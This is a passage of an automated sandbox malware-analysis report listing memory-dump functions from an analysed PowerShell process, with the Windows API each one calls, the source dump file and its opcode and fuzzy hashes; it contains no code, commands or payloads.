                                                                                            • Instruction Fuzzy Hash: 9A21D375604284DFCB14CF50D9C4F1ABBA5FB84714F24CA6DD9494B241C336D806CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000CD006, Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351262661.00000000000CD000.00000040.00000001.sdmp, Offset: 000CD000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 65b1bbf557fecab282b935a0ade14135bbf7c61cb334bbef874c5165f2b48251
                                                                                            • Instruction ID: 0aa9cd9edd93af8a5d9d5bd63b063d8d7624d4c16a94872f814ee555397e5b68
                                                                                            • Opcode Fuzzy Hash: 65b1bbf557fecab282b935a0ade14135bbf7c61cb334bbef874c5165f2b48251
                                                                                            • Instruction Fuzzy Hash: C32180754083809FCB02CF14D994B15BFB1EB46314F28C5EBD8498B257C33A9806CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000BD487, Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351227843.00000000000BD000.00000040.00000001.sdmp, Offset: 000BD000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 772d9e921c2fce2dafd33dba83f54ccbdf3521af3385b63af9a5700ceb345e8c
                                                                                            • Instruction ID: 6d8d2a9f08e52f496687264aa2fce777604702f79b1b6397f0ee83a9457c0dfa
                                                                                            • Opcode Fuzzy Hash: 772d9e921c2fce2dafd33dba83f54ccbdf3521af3385b63af9a5700ceb345e8c
                                                                                            • Instruction Fuzzy Hash: 6511D376404644CFCB16CF14D9C4B56FFB2FB94324F24C6AAD8090B616C336D856CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000BD573, Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351227843.00000000000BD000.00000040.00000001.sdmp, Offset: 000BD000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 772d9e921c2fce2dafd33dba83f54ccbdf3521af3385b63af9a5700ceb345e8c
                                                                                            • Instruction ID: 82fa0723e60968f9232de430931bb7dccae5d7d51e5e888e5af6c4631a33322f
                                                                                            • Opcode Fuzzy Hash: 772d9e921c2fce2dafd33dba83f54ccbdf3521af3385b63af9a5700ceb345e8c
                                                                                            • Instruction Fuzzy Hash: 4F11D376404284CFCB12CF14D9C4B56FFB1FB95324F24C5AAD8094B616D336D856CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000CE66F, Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351262661.00000000000CD000.00000040.00000001.sdmp, Offset: 000CD000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 24c3f5bb668936d2efe1fd5f391589a95ba7ff612a20b3a2dc726edd9804e952
                                                                                            • Instruction ID: 6535c404fa03d0a1ab19f57d81309a77e30d522977fdd5ce8f102ab2d4c3e4a1
                                                                                            • Opcode Fuzzy Hash: 24c3f5bb668936d2efe1fd5f391589a95ba7ff612a20b3a2dc726edd9804e952
                                                                                            • Instruction Fuzzy Hash: D5119D79508284DFCB05CF14D5C4B19BFA2FB85314F28C6ADD8494B656C33AD85ACF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000BD795, Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351227843.00000000000BD000.00000040.00000001.sdmp, Offset: 000BD000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b61fed542ff2017f9aea9b1b8361b1cb15fdef35403004d1545e6371577188cf
                                                                                            • Instruction ID: a9affd20d84779a21461d4ecb0d4c0a41255eee27d3e44d24d8b13fbf3822d1b
                                                                                            • Opcode Fuzzy Hash: b61fed542ff2017f9aea9b1b8361b1cb15fdef35403004d1545e6371577188cf
                                                                                            • Instruction Fuzzy Hash: 1701847504C3849AD7608A55CC84BEBFFDCEF51724F28845BD9051A282E7799840D6B1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000BD794, Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351227843.00000000000BD000.00000040.00000001.sdmp, Offset: 000BD000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 456a4876fc2d743a9e3972b3e4e20194070a1f82a77ef459018bdcc74b7d9223
                                                                                            • Instruction ID: 96f5acb98ccfc8da58bd781fa8c2da8e579ff16a89904e25f07370ebe493b304
                                                                                            • Opcode Fuzzy Hash: 456a4876fc2d743a9e3972b3e4e20194070a1f82a77ef459018bdcc74b7d9223
                                                                                            • Instruction Fuzzy Hash: 67F062754487849EEB608F15C888BA3FFD8EB51724F28C55AED485B286D3789C44CBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Analysis Process: powershell.exe PID: 2792 Parent PID: 2900 powershell.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 01D7ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D7AD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: c3c7559cf9910d533de8a764e615a884e14d4e73d7838cf53509cfa0321c1c14
                                                                                            • Instruction ID: 68910cc42b456b0f0b934fa64cbe3ea0742a0c762bda68351d3ae1291b67447a
                                                                                            • Opcode Fuzzy Hash: c3c7559cf9910d533de8a764e615a884e14d4e73d7838cf53509cfa0321c1c14
                                                                                            • Instruction Fuzzy Hash: F9219F765097849FEB238F29DC44B92BFB4EF06310F09849AE9858B563E2719908DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D7AD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: c8d1d17b43cfb6aa3756b8399a618bb78d53d300dd14c247f88538951820b18f
                                                                                            • Instruction ID: 4f97b2eecd281732d0bdbd36b1559dd548785319bbdcd385c7f3f688344fe3bc
                                                                                            • Opcode Fuzzy Hash: c8d1d17b43cfb6aa3756b8399a618bb78d53d300dd14c247f88538951820b18f
                                                                                            • Instruction Fuzzy Hash: DF115E75500704DFEB21CF59D885B96FBE4EF08621F08C46AED498B662E371E414DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D7B329
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: 8389d448c20ef6f924b415b554c012e7d91bfe8a301ab4813842299b9079909b
                                                                                            • Instruction ID: 892da6b61c9e72252d11ebac108ff41164106bf2a3955e5bd6dac89c4e413603
                                                                                            • Opcode Fuzzy Hash: 8389d448c20ef6f924b415b554c012e7d91bfe8a301ab4813842299b9079909b
                                                                                            • Instruction Fuzzy Hash: 9E11A071509380AFDB228F15DC45F62FFB4EF06220F09849BED854B663D275A818DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D7B329
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: 87b03d977e536d4cc4fa70331f371a0a41d83f08a18cf6cbf7fa766b71a185b8
                                                                                            • Instruction ID: 11193772a4ef2fde05513147ffceff910c01300067c44d6aeae4951007421c08
                                                                                            • Opcode Fuzzy Hash: 87b03d977e536d4cc4fa70331f371a0a41d83f08a18cf6cbf7fa766b71a185b8
                                                                                            • Instruction Fuzzy Hash: 75018B31400700DFEB218F09D889B61FBA0EF08620F08C09ADD894B616E275E458DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 028401D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: f8fc3e5dbaa44921961b6ed96869d0b92e0aa5afccda325f3d6b3b46d1237934
                                                                                            • Instruction ID: d4d2d95decdf38b20a75d42b6d5b7372efb979f6837e72a78ee4b80f6110f419
                                                                                            • Opcode Fuzzy Hash: f8fc3e5dbaa44921961b6ed96869d0b92e0aa5afccda325f3d6b3b46d1237934
                                                                                            • Instruction Fuzzy Hash: 2931487650E3C48FE7138B759C65692BFB4AF03210F0E84DBD984CF1A3D6299809DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0284067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0284072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 637d809719f86d796059057d6c0c5af7e7d5245751bc220e000a4e11d834ecd0
                                                                                            • Instruction ID: d08840e0263ca24dd385aac021364fbbea10680e5d3741597e9c0749d8b05e2b
                                                                                            • Opcode Fuzzy Hash: 637d809719f86d796059057d6c0c5af7e7d5245751bc220e000a4e11d834ecd0
                                                                                            • Instruction Fuzzy Hash: D0317275505344AFE721CF65CC45F52BFF8EF05210F09849EE989CB293D325A808CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 02840DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: fbb3f9fd545b90fe678205d915a2646b95cd499303a8853938c0a27c57a07a94
                                                                                            • Instruction ID: 9b282c147dc6460a1118853937aae15b43f4203f66377a035df46f1d1f2b600a
                                                                                            • Opcode Fuzzy Hash: fbb3f9fd545b90fe678205d915a2646b95cd499303a8853938c0a27c57a07a94
                                                                                            • Instruction Fuzzy Hash: 05310875509384AFE712CB25CC41B96BFE8DF06210F0884AAE948CF283D335E909C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,F3C28CC5,00000000,00000000,00000000,00000000), ref: 01D7BDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: 018cf16edf52314180bb885a1817ae75ab8d35e7c0d4600a88fa6adf9e31d46a
                                                                                            • Instruction ID: 44d2f09fe41e5cba080fc47eae80ba962702efe0ba44e2da66499d1641e57c19
                                                                                            • Opcode Fuzzy Hash: 018cf16edf52314180bb885a1817ae75ab8d35e7c0d4600a88fa6adf9e31d46a
                                                                                            • Instruction Fuzzy Hash: 6931C372009380AFE722CB60CC45F96BFB8EF06210F1884DBF985CB193D224A908C7B1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,F3C28CC5,00000000,00000000,00000000,00000000), ref: 01D7AFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: ef74997324de2ec91a092e93fa1a331dea0c2f4b843d9ed3a668baebfb7f6e9d
                                                                                            • Instruction ID: c972eaeaa47430d2158ea8ece132209cf9a5aae49749f3766f889cb54c526a84
                                                                                            • Opcode Fuzzy Hash: ef74997324de2ec91a092e93fa1a331dea0c2f4b843d9ed3a668baebfb7f6e9d
                                                                                            • Instruction Fuzzy Hash: 0F21A2B2509380AFE7138B64DC45B96BFB8EF06320F0884DBE985DB193D265A949C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0284109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 2c23e2332c49d3158d6e5b4215356f472f2cbb6e9eddc93b482a721089882c24
                                                                                            • Instruction ID: 301be7a0ec612832299744d2e5398d6a1401b98cf54717c0dc13983505887d23
                                                                                            • Opcode Fuzzy Hash: 2c23e2332c49d3158d6e5b4215356f472f2cbb6e9eddc93b482a721089882c24
                                                                                            • Instruction Fuzzy Hash: 1E31717550E3C06FD3138B358C55B56BFB4AF43610F1A81DBD884CF2A3D629A909C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,F3C28CC5,00000000,00000000,00000000,00000000), ref: 01D7B0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: 8e9beabcacaa960ad39c13c4e2274cb9bed7658893902b968852126372b181f4
                                                                                            • Instruction ID: 1f8e98ae1ae9318160062564e6215e8e292506c3d1d75bc6f78e721e310a2a2d
                                                                                            • Opcode Fuzzy Hash: 8e9beabcacaa960ad39c13c4e2274cb9bed7658893902b968852126372b181f4
                                                                                            • Instruction Fuzzy Hash: 8D218171509380AFE722CF15DC45FA6BFB8EF46220F0884ABE945DB192D664E948CB71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7A1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01D7A23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleCtrlHandler
                                                                                            • String ID:
                                                                                            • API String ID: 1513847179-0
                                                                                            • Opcode ID: 1a0e5a52740b8336ae3b1a2c5ed3c96945156a3b2d1aca75443ce150274265c3
                                                                                            • Instruction ID: eb51c8d56a98b8010ee96fcfa49d87786d02cdeea271eb92843e70bda27ede00
                                                                                            • Opcode Fuzzy Hash: 1a0e5a52740b8336ae3b1a2c5ed3c96945156a3b2d1aca75443ce150274265c3
                                                                                            • Instruction Fuzzy Hash: 7121C77180D3C06FD3128B358C55B66BFB4EF47620F1981DBD884CF693D229A919C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,F3C28CC5,00000000,00000000,00000000,00000000), ref: 02840819
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: fd1a1dee35c4535f6521991027bd91643d1736c2fb0ba8095ac955f1ec613674
                                                                                            • Instruction ID: 967eb2dea2a38029c4afa7ef2cc2e018b662729a47f4b4a16fb636d0c06eaeff
                                                                                            • Opcode Fuzzy Hash: fd1a1dee35c4535f6521991027bd91643d1736c2fb0ba8095ac955f1ec613674
                                                                                            • Instruction Fuzzy Hash: 2A210A76408784AFE712CB159C45FA3BFA8EF46720F0881DBF9848F193D224A905C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02840502
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: 541b595fffa467cfe3d63c3aba41f26d0a35bb1fbfa2f47eba33f3c6f5160f19
                                                                                            • Instruction ID: 25069c1bc4055552b9d1666dbb58092f3b96b32e7df918743e69a67d15ea2f90
                                                                                            • Opcode Fuzzy Hash: 541b595fffa467cfe3d63c3aba41f26d0a35bb1fbfa2f47eba33f3c6f5160f19
                                                                                            • Instruction Fuzzy Hash: C6217F7540E3C0AFD3128B359C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028406AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0284072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: a878f8c48f2d229ef3e1259419cda9748bb2a0a3ac7f45a28ad574e1c0738d27
                                                                                            • Instruction ID: a9d820329a8dee12dcd1ecddea031bd02446d6abb9c0ad09af0ef0ba674aecfd
                                                                                            • Opcode Fuzzy Hash: a878f8c48f2d229ef3e1259419cda9748bb2a0a3ac7f45a28ad574e1c0738d27
                                                                                            • Instruction Fuzzy Hash: 0C21A175500304EFE720DF65CC85F66FBE8EF08610F04846AE949CB292D731E804CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,F3C28CC5,00000000,00000000,00000000,00000000), ref: 028408E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 62e260eaf58da905d48361a4ded57265c84c8db7a94aa3623ffd3af81f663f83
                                                                                            • Instruction ID: eeb6726ae9b52c54b3a623a929a9f6768cc18268a67e3b1ed6834233eaeeefd9
                                                                                            • Opcode Fuzzy Hash: 62e260eaf58da905d48361a4ded57265c84c8db7a94aa3623ffd3af81f663f83
                                                                                            • Instruction Fuzzy Hash: C5219275409380AFE722CF51DC45F56FFB8EF46314F09849BE9449B153C265A909CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01D7A94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: 8b27fa01f6da81fe53b0018c56e4580bf24d4b235253cfe11ec07577f0d086c4
                                                                                            • Instruction ID: e7be24cf3926dd069b6539a34e69bcadab75025e7a0b8e1657dcc3af8a586011
                                                                                            • Opcode Fuzzy Hash: 8b27fa01f6da81fe53b0018c56e4580bf24d4b235253cfe11ec07577f0d086c4
                                                                                            • Instruction Fuzzy Hash: 8321A77540D780AFD3138B25DC51B62BFB4EF87B10F1981DBE8848B653D224A919C7B6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 02840DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: b8f688e584caffc09fa0d126e2f29f1dfe8da2a2fc9b5fa5fecfe8a3e7aea0db
                                                                                            • Instruction ID: 63f9f1599c58812d7548e88861c763b506000817a097fc9f6da938467894348f
                                                                                            • Opcode Fuzzy Hash: b8f688e584caffc09fa0d126e2f29f1dfe8da2a2fc9b5fa5fecfe8a3e7aea0db
                                                                                            • Instruction Fuzzy Hash: 7921AE75604308AFF724DF25DC85BA7FBE8EF04654F04856AE948DB282D775F804CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,F3C28CC5,00000000,00000000,00000000,00000000), ref: 01D7BDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: 381557cc08bb221ea7bfbcab081d63f7f0117d4f987304302cae73555e12c033
                                                                                            • Instruction ID: c4f9623361f9dae29aebfd653fa442835569f3c55551df3e278170fa57fe58a5
                                                                                            • Opcode Fuzzy Hash: 381557cc08bb221ea7bfbcab081d63f7f0117d4f987304302cae73555e12c033
                                                                                            • Instruction Fuzzy Hash: CA119D72500304EFEB21CF55DC85FAAFBA8EF04720F14896AF945DA241E670E9048BB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 02840FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: 1e382850f7640aba1b96e860b95031add6b124b11b1379baa1cc4e9610ce1379
                                                                                            • Instruction ID: fb694f935dc59b6eb0623a6aef0c39b5dea2bc8283552c9dd813a7396b0bb87a
                                                                                            • Opcode Fuzzy Hash: 1e382850f7640aba1b96e860b95031add6b124b11b1379baa1cc4e9610ce1379
                                                                                            • Instruction Fuzzy Hash: D4219F7550D3C49FDB12CB25CC55B92BFB4AF13214F0C84EAD988CF693D2689408CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0284137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: fdaaca9a28775ec405f03e6dc157e79fe68359951e49da0a23d29c6198636d74
                                                                                            • Instruction ID: 958c3df3411eebbe877058a5743e7ee4b3cd7ca74ce2ea48210df3588004b05a
                                                                                            • Opcode Fuzzy Hash: fdaaca9a28775ec405f03e6dc157e79fe68359951e49da0a23d29c6198636d74
                                                                                            • Instruction Fuzzy Hash: 912192765083809FDB21CF25DC45B96FFF4EF06220F08849AED898B562D335A448DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,F3C28CC5,00000000,00000000,00000000,00000000), ref: 01D7B0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: f63d58d7773b8ea650185e91423385cfcfd342de65f2e8e26c699402073b9bb1
                                                                                            • Instruction ID: b6709f858568410d30af5efee7559b8e82c26115e5c3b93253ec9b4d492fb674
                                                                                            • Opcode Fuzzy Hash: f63d58d7773b8ea650185e91423385cfcfd342de65f2e8e26c699402073b9bb1
                                                                                            • Instruction Fuzzy Hash: A7118171600700EFEB21CF19DC85FA6FBE8EF05660F14846BED45CB641E674E9048A71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D7BB2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
